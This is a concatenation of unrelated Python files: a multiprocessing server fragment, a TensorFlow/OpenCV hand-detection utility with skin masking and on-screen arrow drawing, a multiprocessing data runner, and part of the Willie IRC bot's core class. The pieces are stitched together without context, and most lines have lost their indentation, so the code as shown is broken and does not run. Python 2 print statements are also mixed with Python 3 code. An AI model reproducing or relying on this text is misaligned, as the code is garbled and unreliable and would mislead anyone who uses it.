server_settings["port"] = None
processes = []
def sig_handler(signal, frame):
logger.info("Received signal %s. Shutting down.", Signals(signal).name)
for process in processes:
os.kill(process.pid, SIGTERM)
signal_func(SIGINT, lambda s, f: sig_handler(s, f))
signal_func(SIGTERM, lambda s, f: sig_handler(s, f))
for _ in range(workers):
process = Process(target=serve, kwargs=server_settings)
process.daemon = True
process.start()
processes.append(process)
for process in processes:
process.join()
# the above processes will block this until they're stopped
for process in processes:
process.terminate()
server_settings.get("sock").close()
|
detector_utils.py
|
# Utilities for object detector.
import numpy as np
import sys
import tensorflow as tf
import os
from threading import Thread
from datetime import datetime
import cv2
from utils import label_map_util
from collections import defaultdict
from matplotlib import pyplot as plt
from scipy.cluster.vq import vq, kmeans
import time as t
detection_graph = tf.Graph()
sys.path.append("..")
# score threshold for showing bounding boxes.
_score_thresh = 0.27
# MODEL_NAME = 'hand_inference_graph'
# # Path to frozen detection graph. This is the actual model that is used for the object detection.
# PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# # List of the strings that is used to add correct label for each box.
# PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt')
#
# NUM_CLASSES = 1
#
# What model to download.
MODEL_NAME = 'hand_detector_inference_graph'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join(MODEL_NAME, 'object-detection.pbtxt')
NUM_CLASSES = 6
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load a frozen inference graph into memory
def load_inference_graph():
# load frozen tensorflow model into memory
print("> ====== loading HAND frozen graph into memory")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.")
return detection_graph, sess
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes ,classes , im_width, im_height, image_np,prev_p1,prev_p2):
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 2, 1)
cv2.putText(image_np,str(classes[i]),(int(left)-5, int(top)-5),cv2.FONT_HERSHEY_SIMPLEX,2,255)
width = right - left;
height = bottom - top;
prev_width = prev_p2[0] - prev_p1[0];
prev_height = prev_p2[1] - prev_p1[1];
cv2.circle(image_np,(int(left+width/4),int(top+height/4)), 2, (0,0,255), -1)
cv2.circle(image_np,(int(right-width/4),int(top+height/4)), 2, (0,0,255), -1)
cv2.circle(image_np,(int(left+width/4),int(bottom-height/4)), 2, (0,0,255), -1)
cv2.circle(image_np,(int(right-width/4),int(bottom-height/4)), 2, (0,0,255), -1)
cv2.circle(image_np,(int(right-width/2),int(bottom-height/2)), 2, (0,0,255), -1)
if not prev_p1[0]==0 and not prev_p1[1]==0:
cv2.line(image_np,(int(prev_p1[0]+prev_width/4),int(prev_p1[1]+prev_height/4)),(int(left+width/4),int(top+height/4)),(255,0,0),1)
box_area = image_np[int(top):int(bottom),int(left):int(right),:];
hsv_box_area = cv2.cvtColor(box_area,cv2.COLOR_BGR2HSV);
##plt.ion()
# mean = np.mean(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,:],axis=2)#=255
mean_h = np.mean(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,0])#=255
mean_s = np.mean(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,1])
mean_v = np.mean(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,2])
print 'mean : ',mean_h,mean_s,mean_v
min_h = np.min(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,0])#=255
min_s = np.min(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,1])
min_v = np.min(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,2])
# print 'min : ',min_h,min_s,min_v
max_h = np.max(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,0])#=255
max_s = np.max(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,1])
max_v = np.max(box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,2])
# print 'max : ',max_h,max_s,max_v
hue = box_area[(box_area.shape[0]/2):(box_area.shape[0]/2)+80,(box_area.shape[1]/2)-20:(box_area.shape[1]/2)+20,0]
cv2.imshow("box",cv2.cvtColor(box_area, cv2.COLOR_RGB2BGR));
##plt.clf()
# color = ('b','g','r')
# for i,col in enumerate(color):
# histr = cv2.calcHist([hsv_box_area],[i],None,[256],[0,256])
# np.max(histr)
# plt.plot(histr,color = col)
# plt.xlim([0,256])
# plt.show()
hue, sat, val = hsv_box_area[:,:,0], hsv_box_area[:,:,1], hsv_box_area[:,:,2]
##plt.close("all")
img,h,s,v = do_cluster(hsv_box_area, 3, 3)
# org_img = cv2.cvtColor(box_area, cv2.COLOR_HSV2BGR);
cv2.imshow("clusters",cv2.cvtColor(img, cv2.COLOR_HSV2RGB));
# cv2.imshow("img_s",cv2.cvtColor(org_img, cv2.COLOR_BGR2RGB));
# Normal masking algorithm
lower_skin = np.array([mean_h-45,s-50,0])
upper_skin = np.array([mean_h+45,s+50,255])
# print h,s
mask = cv2.inRange(hsv_box_area,lower_skin, upper_skin)
result = cv2.bitwise_and(box_area,box_area,mask = mask)
cv2.imshow('result',result)
gray = cv2.cvtColor(result, cv2.COLOR_BGR2GRAY)
im_bw = cv2.threshold(gray, 125, 255, cv2.THRESH_BINARY_INV)[1]
cv2.imshow('result1',im_bw)
# new_image = cv2.cvtColor(new_image, cv2.COLOR_HSV2RGB)
# plt.imshow(new_image)
# plt.show()
prev_p1 = p1;
prev_p2 = p2;
return p1,p2
return (0,0),(0,0)
def calculate_intersection(box_1,box_2,im_width,im_height):
(left_1, right_1, top_1, bottom_1) = (box_1[1] * im_width, box_1[3] * im_width,
box_1[0] * im_height, box_1[2] * im_height)
(left_2, right_2, top_2, bottom_2) = (box_2[1] * im_width, box_2[3] * im_width,
box_2[0] * im_height, box_2[2] * im_height)
area_2 = (right_2-left_2)*(bottom_2-top_2)
x = max(left_1, left_2)
y = max(top_1, top_2)
    # the boxes overlap only if they intersect on both axes
    if x <= min(right_1, right_2) and y <= min(bottom_1, bottom_2):
        w = min(right_1, right_2) - x
        h = min(bottom_1, bottom_2) - y
    else:
        w = 0
        h = 0
    return x, y, w, h
def is_hand_opened(hand_class):
if hand_class == 5.0 or hand_class == 4.0 or hand_class == 3.0:
return 1
elif hand_class == 6.0:
return 0
else:
return -1
def draw_steering_wheel(img,rotation):
raduis = min(img.shape[0],img.shape[1]);
raduis = (raduis - raduis/6)/2;
wheel_color = (200,200,200);
shift_from_center = 55
# rotation = np.abs(rotation)
# if rotation >= shift_from_center:
# dest = 0
# else:
# dest = np.sqrt(shift_from_center*shift_from_center-rotation*rotation)
# print shift_from_center,rotation,dest
overlay = img.copy()
# (2) draw shapes:
# (3) blend with the original:
opacity = 0.4
cv2.circle(overlay,(int(img.shape[1]/2),int(img.shape[0]/2)), raduis,wheel_color , 3)
cv2.circle(overlay,(int(img.shape[1]/2),int(img.shape[0]/2)), raduis-25,wheel_color, 3)
cv2.line(overlay,(int((img.shape[1]/2)-shift_from_center),int(img.shape[0]/2)+rotation),(int(((img.shape[1]/2))+shift_from_center),int(img.shape[0]/2)-rotation),wheel_color , 3)
cv2.addWeighted(overlay, opacity, img, 1 - opacity, 0, img)
# pts = np.array([[int(((img.shape[1]/2))+dest),int(img.shape[0]/2)+rotation]
# ,[int(((img.shape[1]/2))+dest-10),int(img.shape[0]/2)-10]+rotation,
# [int(((img.shape[1]/2))+dest-10),int(img.shape[0]/2)+10]]+rotation,
# np.int32)
# pts = pts.reshape((-1,1,2))
# cv2.polylines(img,[pts],True,wheel_color,3,-1)
# if rotation>=0:
# cv2.line(img,(int((img.shape[1]/2)-raduis+25+(rotation/4.2)),int(img.shape[0]/2)-10-rotation),(int((img.shape[1]/2)+raduis-25-rotation/3.8),int(img.shape[0]/2)-10+rotation),wheel_color , 3)
# cv2.line(img,(int((img.shape[1]/2)-raduis+25+(rotation/3.8)),int(img.shape[0]/2)+10-rotation),(int((img.shape[1]/2)+raduis-25-rotation/4.2),int(img.shape[0]/2)+10+rotation),wheel_color , 3)
# cv2.line(img,(int((img.shape[1]/2)-25),int(img.shape[0]/2)),(int(((img.shape[1]/2)+25)),int(img.shape[0]/2)+10+rotation),wheel_color , 3)
# else:
# cv2.line(img,(int((img.shape[1]/2)-raduis+25-(rotation/4.2)),int(img.shape[0]/2)-10-rotation),(int((img.shape[1]/2)+raduis-25+rotation/3.8),int(img.shape[0]/2)-10+rotation),wheel_color , 3)
# cv2.line(img,(int((img.shape[1]/2)-raduis+25-(rotation/3.8)),int(img.shape[0]/2)+10-rotation),(int((img.shape[1]/2)+raduis-25+rotation/4.2),int(img.shape[0]/2)+10+rotation),wheel_color , 3)
return img
def draw_right_arrow(img,shift_arrow):
wheel_color = (200,200,200)
shift_from_center = 55
overlay = img.copy()
# (2) draw shapes:
# (3) blend with the original:
opacity = 0.7
cv2.line(overlay,(int((img.shape[1]/2)-shift_from_center+shift_arrow*5),int(img.shape[0]/2)),(int(((img.shape[1]/2))+shift_from_center+shift_arrow*5),int(img.shape[0]/2)),wheel_color , 15)
pts = np.array([[int(((img.shape[1]/2))+shift_from_center+shift_arrow*5)+25,int(img.shape[0]/2)]
,[int(((img.shape[1]/2))+shift_from_center+shift_arrow*5),int(img.shape[0]/2)-25],
[int(((img.shape[1]/2))+shift_from_center+shift_arrow*5),int(img.shape[0]/2)+25]],
np.int32)
pts = pts.reshape((-1,1,2))
# cv2.fillPoly(img,[pts],wheel_color,-1)
cv2.fillPoly(overlay, [pts], wheel_color, 8)
cv2.addWeighted(overlay, opacity, img, 1 - opacity, 0, img)
return img
def draw_left_arrow(img,shift_arrow):
wheel_color = (200,200,200)
shift_from_center = 55
overlay = img.copy()
# (2) draw shapes:
# (3) blend with the original:
opacity = 0.7
cv2.line(overlay,(int((img.shape[1]/2)-shift_from_center-shift_arrow*5),int(img.shape[0]/2)),(int(((img.shape[1]/2))+shift_from_center-shift_arrow*5),int(img.shape[0]/2)),wheel_color , 15)
pts = np.array([[int(((img.shape[1]/2))-shift_from_center-shift_arrow*5)-25,int(img.shape[0]/2)]
,[int(((img.shape[1]/2))-shift_from_center-shift_arrow*5),int(img.shape[0]/2)-25],
[int(((img.shape[1]/2))-shift_from_center-shift_arrow*5),int(img.shape[0]/2)+25]],
np.int32)
pts = pts.reshape((-1,1,2))
# cv2.fillPoly(img,[pts],wheel_color,-1)
cv2.fillPoly(overlay, [pts], wheel_color, 8)
cv2.addWeighted(overlay, opacity, img, 1 - opacity, 0, img)
return img
def draw_up_arrow(img,shift_arrow):
wheel_color = (200,200,200)
shift_from_center = 55
overlay = img.copy()
# (2) draw shapes:
# (3) blend with the original:
opacity = 0.7
cv2.line(overlay,(int((img.shape[1]/2)),int(img.shape[0]/2)-shift_from_center-shift_arrow*5),(int(((img.shape[1]/2))),int(img.shape[0]/2)+shift_from_center-shift_arrow*5),wheel_color , 15)
pts = np.array([[int((img.shape[1]/2)),int((img.shape[0]/2-shift_from_center-shift_arrow*5))-25]
,[int((img.shape[1]/2))-25,int((img.shape[0]/2)-shift_from_center-shift_arrow*5)],
[int((img.shape[1]/2))+25,int((img.shape[0]/2-shift_from_center-shift_arrow*5))]],
np.int32)
pts = pts.reshape((-1,1,2))
# cv2.fillPoly(img,[pts],wheel_color,-1)
cv2.fillPoly(overlay, [pts], wheel_color, 8)
cv2.addWeighted(overlay, opacity, img, 1 - opacity, 0, img)
return img
def draw_down_arrow(img,shift_arrow):
wheel_color = (200,200,200)
shift_from_center = 55
overlay = img.copy()
# (2) draw shapes:
# (3) blend with the original:
opacity = 0.7
cv2.line(overlay,(int((img.shape[1]/2)),int(img.shape[0]/2)-shift_from_center+shift_arrow*5),(int(((img.shape[1]/2))),int(img.shape[0]/2)+shift_from_center+shift_arrow*5),wheel_color , 15)
pts = np.array([[int((img.shape[1]/2)),int((img.shape[0]/2+shift_from_center+shift_arrow*5))+25]
,[int((img.shape[1]/2))-25,int((img.shape[0]/2)+shift_from_center+shift_arrow*5)],
[int((img.shape[1]/2))+25,int((img.shape[0]/2+shift_from_center+shift_arrow*5))]],
np.int32)
pts = pts.reshape((-1,1,2))
# cv2.fillPoly(img,[pts],wheel_color,-1)
cv2.fillPoly(overlay, [pts], wheel_color, 8)
cv2.addWeighted(overlay, opacity, img, 1 - opacity, 0, img)
return img
def check_pattern(list_1, list_2, pattern):
    array_list_1 = np.array(list_1)
    array_list_2 = np.array(list_2)
    array_pattern = np.array(pattern)
    return np.array_equal((array_list_1 | array_list_2), array_pattern)
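# Worked example (editor's note, illustrative values only): the two lists are
# OR-ed elementwise and the result is compared with the pattern, e.g.
#   check_pattern([1, 0, 0], [0, 1, 0], [1, 1, 0])  -> True
#   check_pattern([1, 0, 0], [0, 0, 0], [1, 1, 0])  -> False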
def do_cluster(hsv_image, K, channels):
    # gets height, width and the number of channels from the image shape
h,w,c = hsv_image.shape
# prepares data for clustering by reshaping the image matrix into a (h*w) x c matrix of pixels
cluster_data = hsv_image.reshape( (h*w,c) )
# grabs the initial time
t0 = t.time()
# performs clustering
codebook, distortion = kmeans(np.array(cluster_data[:,0:channels], dtype=np.float), K)
# takes the final time
t1 = t.time()
print "Clusterization took %0.5f seconds" % (t1-t0)
# calculates the total amount of pixels
tot_pixels = h*w
# generates clusters
data, dist = vq(cluster_data[:,0:channels], codebook)
# calculates the number of elements for each cluster
weights = [len(data[data == i]) for i in range(0,K)]
# creates a 4 column matrix in which the first element is the weight and the other three
# represent the h, s and v values for each cluster
color_rank = np.column_stack((weights, codebook))
# sorts by cluster weight
color_rank = color_rank[np.argsort(color_rank[:,0])]
# print color_rank
# print color_rank[::-1]
# creates a new blank image
new_image = np.array([0,0,255], dtype=np.uint8) * np.ones( (200, 200, 3), dtype=np.uint8)
img_height = new_image.shape[0]
img_width = new_image.shape[1]
# for each cluster
for i,c in enumerate(color_rank[::-1]):
# gets the weight of the cluster
weight = c[0]
# calculates the height and width of the bins
height = int(weight/float(tot_pixels) *img_height )
width = img_width/len(color_rank)
# calculates the position of the bin
x_pos = i*width
# defines a color so that if less than three channels have been used
# for clustering, the color has average saturation and luminosity value
color = np.array( [0,128,200], dtype=np.uint8)
# substitutes the known HSV components in the default color
for j in range(len(c[1:])):
color[j] = c[j+1]
# print color[j] , j
# draws the bin to the image
# print color[0], color[1]
new_image[ img_height-height:img_height, x_pos:x_pos+width] = [color[0], color[1], color[2]]
# returns the cluster representation
# print color_rank[0]
return new_image,int(color_rank[0][1]),int(color_rank[0][2]),int(color_rank[0][3])
# Show fps value on image.
def draw_fps_on_image(fps, image_np):
cv2.putText(image_np, fps, (20, 50),
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2)
# Actual detection .. generate scores and bounding boxes given an image
def detect_objects(image_np, detection_graph, sess):
    # Define input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
    # Each score represents the level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores),np.squeeze(classes)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
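# Usage sketch (hedged): a minimal capture loop, assuming a webcam at index 0.
#   vs = WebcamVideoStream(src=0, width=640, height=480).start()
#   while True:
#       frame = vs.read()
#       cv2.imshow('frame', frame)
#       if cv2.waitKey(1) == 27:  # Esc quits
#           break
#   vs.stop()
#   cv2.destroyAllWindows()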
|
data_runner.py
|
import multiprocessing
class DataRunnerMP:
"""
A multi-processing data runner for tensorflow
"""
def __init__(self, task_func, task_generator, input_pls, capacity=100):
self._input_pls = input_pls
self._task_func = task_func
self._task_generator = task_generator
self.counter = 0
self.processes = []
self._queue_outputs = self._input_pls
self.capacity = capacity
def get_feed_batch(self):
if self.counter % 100 == 0:
print('qlen=%i' % self.data_queue.qsize())
self.counter += 1
feed = self.data_queue.get()
out_feed= {}
for k, v in feed.items():
out_feed[self._input_pls[k]] = v
return out_feed
def get_inputs(self):
return dict(self._queue_outputs)
def _worker_main(self, task_queue, data_queue):
"""
generate sample from task queue and put the sample
into a data queue in the form of tf feed_dict
"""
while True:
task = task_queue.get()
sample = self._task_func(task)
if sample is None:
continue
feed = {}
for key, pl in self._input_pls.items():
feed[key] = sample[key]
data_queue.put(feed)
def _manager_main(self, queue):
"""
put tasks into queue
"""
for task in self._task_generator():
queue.put(task)
def start_processes(self, sess, n_processes=1):
self.task_queue = multiprocessing.Queue(self.capacity)
self.data_queue = multiprocessing.Queue(self.capacity)
p = multiprocessing.Process(target=self._manager_main, args=(self.task_queue,))
p.daemon = True
p.start()
self.processes.append(p)
for n in range(n_processes):
p = multiprocessing.Process(target=self._worker_main, args=(self.task_queue,self.data_queue))
p.daemon = True
p.start()
self.processes.append(p)
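# Usage sketch (hedged): `make_sample`, `list_tasks`, `train_op` and the placeholder
# shape below are hypothetical; they only illustrate how the runner is wired up.
#   input_pls = {'x': tf.placeholder(tf.float32, [None, 32])}
#   runner = DataRunnerMP(make_sample, list_tasks, input_pls, capacity=100)
#   runner.start_processes(sess, n_processes=4)
#   feed_dict = runner.get_feed_batch()
#   sess.run(train_op, feed_dict=feed_dict)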
|
bot.py
|
# coding=utf8
"""
bot.py - Willie IRC Bot
Copyright 2008, Sean B. Palmer, inamidst.com
Copyright 2012, Edward Powell, http://embolalia.net
Copyright © 2012, Elad Alfassa <[email protected]>
Licensed under the Eiffel Forum License 2.
http://willie.dftba.net/
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
import time
import imp
import os
import re
import sys
import socket
import threading
from datetime import datetime
from willie import tools
import willie.irc as irc
from willie.db import WillieDB
from willie.tools import (stderr, PriorityQueue, Identifier, released, get_command_regexp,
iteritems, itervalues)
from willie.trigger import Trigger
import willie.module as module
from willie.logger import get_logger
LOGGER = get_logger(__name__)
if sys.version_info.major >= 3:
unicode = str
basestring = str
py3 = True
else:
py3 = False
class Willie(irc.Bot):
NOLIMIT = module.NOLIMIT
def __init__(self, config):
irc.Bot.__init__(self, config.core)
self.config = config
"""The ``Config`` for the current Willie instance."""
self.doc = {}
"""
A dictionary of command names to their docstring and example, if
declared. The first item in a callable's commands list is used as the
key in version *3.2* onward. Prior to *3.2*, the name of the function
as declared in the source code was used.
"""
self.stats = {}
"""
A dictionary which maps a tuple of a function name and where it was
        used to the number of times it was used there.
"""
self.times = {}
"""
        A dictionary mapping lower-cased nicks to dictionaries which map
        function names to the time at which they were last used by that nick.
"""
self.acivity = {}
self.server_capabilities = set()
"""A set containing the IRCv3 capabilities that the server supports.
For servers that do not support IRCv3, this will be an empty set."""
self.enabled_capabilities = set()
"""A set containing the IRCv3 capabilities that the bot has enabled."""
self._cap_reqs = dict()
"""A dictionary of capability requests
Maps the capability name to a list of tuples of the prefix ('-', '=',
or ''), the name of the requesting module, and the function to call if
the request is rejected."""
self.privileges = dict()
"""A dictionary of channels to their users and privilege levels
The value associated with each channel is a dictionary of Identifiers to a
bitwise integer value, determined by combining the appropriate constants
from `module`."""
self.db = WillieDB(config)
"""The bot's database."""
self.memory = tools.WillieMemory()
"""
A thread-safe dict for storage of runtime data to be shared between
modules. See `WillieMemory <#tools.Willie.WillieMemory>`_
"""
self.scheduler = Willie.JobScheduler(self)
self.scheduler.start()
#Set up block lists
#Default to empty
if not self.config.core.nick_blocks:
self.config.core.nick_blocks = []
        if not self.config.core.host_blocks:
self.config.core.host_blocks = []
#Add nicks blocked under old scheme, if present
if self.config.core.other_bots:
nicks = self.config.core.get_list('nick_blocks')
bots = self.config.core.get_list('other_bots')
nicks.extend(bots)
self.config.core.nick_blocks = nicks
self.config.core.other_bots = False
self.config.save()
self.setup()
class JobScheduler(threading.Thread):
"""Calls jobs assigned to it in steady intervals.
JobScheduler is a thread that keeps track of Jobs and calls them every
X seconds, where X is a property of the Job. It maintains jobs in a
priority queue, where the next job to be called is always the first
item.
Thread safety is maintained with a mutex that is released during long
operations, so methods add_job and clear_jobs can be safely called from
the main thread.
"""
min_reaction_time = 30.0 # seconds
"""How often should scheduler checks for changes in the job list."""
def __init__(self, bot):
"""Requires bot as argument for logging."""
threading.Thread.__init__(self)
self.bot = bot
self._jobs = PriorityQueue()
            # While PriorityQueue itself is thread safe, this mutex is needed
# to stop old jobs being put into new queue after clearing the
# queue.
self._mutex = threading.Lock()
# self.cleared is used for more fine grained locking.
self._cleared = False
def add_job(self, job):
"""Add a Job to the current job queue."""
self._jobs.put(job)
def clear_jobs(self):
"""Clear current Job queue and start fresh."""
if self._jobs.empty():
# Guards against getting stuck waiting for self._mutex when
# thread is waiting for self._jobs to not be empty.
return
with self._mutex:
self._cleared = True
self._jobs = PriorityQueue()
def run(self):
"""Run forever."""
while True:
try:
self._do_next_job()
except Exception:
# Modules exceptions are caught earlier, so this is a bit
# more serious. Options are to either stop the main thread
# or continue this thread and hope that it won't happen
# again.
self.bot.error()
# Sleep a bit to guard against busy-looping and filling
# the log with useless error messages.
time.sleep(10.0) # seconds
def _do_next_job(self):
"""Wait until there is a job and do it."""
with self._mutex:
# Wait until the next job should be executed.
# This has to be a loop, because signals stop time.sleep().
while True:
job = self._jobs.peek()
difference = job.next_time - time.time()
duration = min(difference, self.min_reaction_time)
if duration <= 0:
break
with released(self._mutex):
time.sleep(duration)
self._cleared = False
job = self._jobs.get()
with released(self._mutex):
if job.func.thread:
t = threading.Thread(
target=self._call, args=(job.func,)
)
t.start()
else:
self._call(job.func)
job.next()
# If jobs were cleared during the call, don't put an old job
# into the new job queue.
if not self._cleared:
self._jobs.put(job)
def _call(self, func):
"""Wrapper for collecting errors from modules."""
# Willie.bot.call is way too specialized to be used instead.
try:
func(self.bot)
except Exception:
self.bot.error()
class Job(object):
"""Hold information about when a function should be called next.
Job is a simple structure that hold information about when a function
should be called next.
They can be put in a priority queue, in which case the Job that should
be executed next is returned.
Calling the method next modifies the Job object for the next time it
should be executed. Current time is used to decide when the job should
be executed next so it should only be called right after the function
was called.
"""
max_catchup = 5
"""
This governs how much the scheduling of jobs is allowed
to get behind before they are simply thrown out to avoid
calling the same function too many times at once.
"""
def __init__(self, interval, func):
"""Initialize Job.
Args:
interval: number of seconds between calls to func
func: function to be called
"""
self.next_time = time.time() + interval
self.interval = interval
self.func = func
def next(self):
"""Update self.next_time with the assumption func was just called.
Returns: A modified job object.
"""
last_time = self.next_time
current_time = time.time()
delta = last_time + self.interval - current_time
if last_time > current_time + self.interval:
# Clock appears to have moved backwards. Reset
# the timer to avoid waiting for the clock to
# catch up to whatever time it was previously.
self.next_time = current_time + self.interval
elif delta < 0 and abs(delta) > self.interval * self.max_catchup:
# Execution of jobs is too far behind. Give up on
# trying to catch up and reset the time, so that
# will only be repeated a maximum of
# self.max_catchup times.
self.next_time = current_time - \
self.interval * self.max_catchup
else:
self.next_time = last_time + self.interval
return self
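        # Worked example (illustrative): with interval=20 and max_catchup=5, a job
        # that finishes 30s late has delta = 20 - 30 = -10, so next_time stays at
        # last_time + 20 (already in the past) and the job re-runs immediately to
        # catch up. If it is 150s late, |delta| = 130 > 100 = interval * max_catchup,
        # so next_time is reset to current_time - 100 and at most 5 catch-up runs occur.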
def __cmp__(self, other):
"""Compare Job objects according to attribute next_time."""
return self.next_time - other.next_time
if py3:
def __lt__(self, other):
return self.next_time < other.next_time
def __gt__(self, other):
return self.next_time > other.next_time
def __str__(self):
"""Return a string representation of the Job object.
Example result:
<Job(2013-06-14 11:01:36.884000, 20s, <function upper at 0x02386BF0>)>
"""
iso_time = str(datetime.fromtimestamp(self.next_time))
return "<Job(%s, %ss, %s)>" % \
(iso_time, self.interval, self.func)
def __iter__(self):
"""This is an iterator. Never stops though."""
return self
def setup(self):
stderr("\nWelcome to Willie. Loading modules...\n\n")
self.callables = set()
self.shutdown_methods = set()
filenames = self.config.enumerate_modules()
# Coretasks is special. No custom user coretasks.
this_dir = os.path.dirname(os.path.abspath(__file__))
filenames['coretasks'] = os.path.join(this_dir, 'coretasks.py')
modules = []
error_count = 0
for name, filename in iteritems(filenames):
try:
module = imp.load_source(name, filename)
except Exception as e:
error_count = error_count + 1
filename, lineno = tools.get_raising_file_and_line()
rel_path = os.path.relpath(filename, os.path.dirname(__file__))
raising_stmt = "%s:%d" % (rel_path, lineno)
stderr("Error loading %s: %s (%s)" % (name, e, raising_stmt))
else:
try:
if hasattr(module, 'setup'):
module.setup(self)
self.register(vars(module))
modules.append(name)
except Exception as e:
error_count = error_count + 1
filename, lineno = tools.get_raising_file_and_line()
rel_path = os.path.relpath(
filename, os.path.dirname(__file__)
)
raising_stmt = "%s:%d" % (rel_path, lineno)
stderr("Error in %s setup procedure: %s (%s)"
% (name, e, raising_stmt))
if modules:
stderr('\n\nRegistered %d modules,' % (len(modules) - 1))
stderr('%d modules failed to load\n\n' % error_count)
else:
stderr("Warning: Couldn't find any modules")
self.bind_commands()
@staticmethod
def is_callable(obj):
"""Return true if object is a willie callable.
        Object must be both callable and hashable. Furthermore, it must
have either "commands", "rule" or "interval" as attributes to mark it
as a willie callable.
"""
if not callable(obj):
# Check is to help distinguish between willie callables and objects
# which just happen to have parameter commands or rule.
return False
if (hasattr(obj, 'commands') or
hasattr(obj, 'rule') or
hasattr(obj, 'interval')):
return True
return False
@staticmethod
def is_shutdown(obj):
"""Return true if object is a willie shutdown method.
        Object must be both callable and named shutdown.
"""
if (callable(obj) and
hasattr(obj, "__name__")
and obj.__name__ == 'shutdown'):
return True
return False
def register(self, variables):
"""Register all willie callables.
With the ``__dict__`` attribute from a Willie module, update or add the
trigger commands and rules, to allow the function to be triggered, and
shutdown methods, to allow the modules to be notified when willie is
quitting.
"""
for obj in itervalues(variables):
if self.is_callable(obj):
self.callables.add(obj)
if self.is_shutdown(obj):
self.shutdown_methods.add(obj)
def unregister(self, variables):
"""Unregister all willie callables in variables, and their bindings.
When unloading a module, this ensures that the unloaded modules will
not get called and that the objects can be garbage collected. Objects
that have not been registered are ignored.
Args:
variables -- A list of callable objects from a willie module.
"""
def remove_func(func, commands):
"""Remove all traces of func from commands."""
for func_list in itervalues(commands):
if func in func_list:
func_list.remove(func)
for obj in itervalues(variables):
if obj in self.callables:
self.callables.remove(obj)
for commands in itervalues(self.commands):
remove_func(obj, commands)
if obj in self.shutdown_methods:
try:
obj(self)
except Exception as e:
stderr(
"Error calling shutdown method for module %s:%s" %
(obj.__module__, e)
)
self.shutdown_methods.remove(obj)
def sub(self, pattern):
"""Replace any of the following special directives in a function's rule expression:
$nickname -> the bot's nick
$nick -> the bot's nick followed by : or ,
"""
nick = re.escape(self.nick)
# These replacements have significant order
subs = [('$nickname', r'{0}'.format(nick)),
('$nick', r'{0}[,:]\s+'.format(nick)),
]
for directive, subpattern in subs:
pattern = pattern.replace(directive, subpattern)
return pattern
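        # Example (illustrative): if self.nick is 'Willie', the rule '$nick(.*)'
        # becomes r'Willie[,:]\s+(.*)', matching "Willie: hello" or "Willie, hello",
        # while '$nickname' on its own becomes just 'Willie'.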
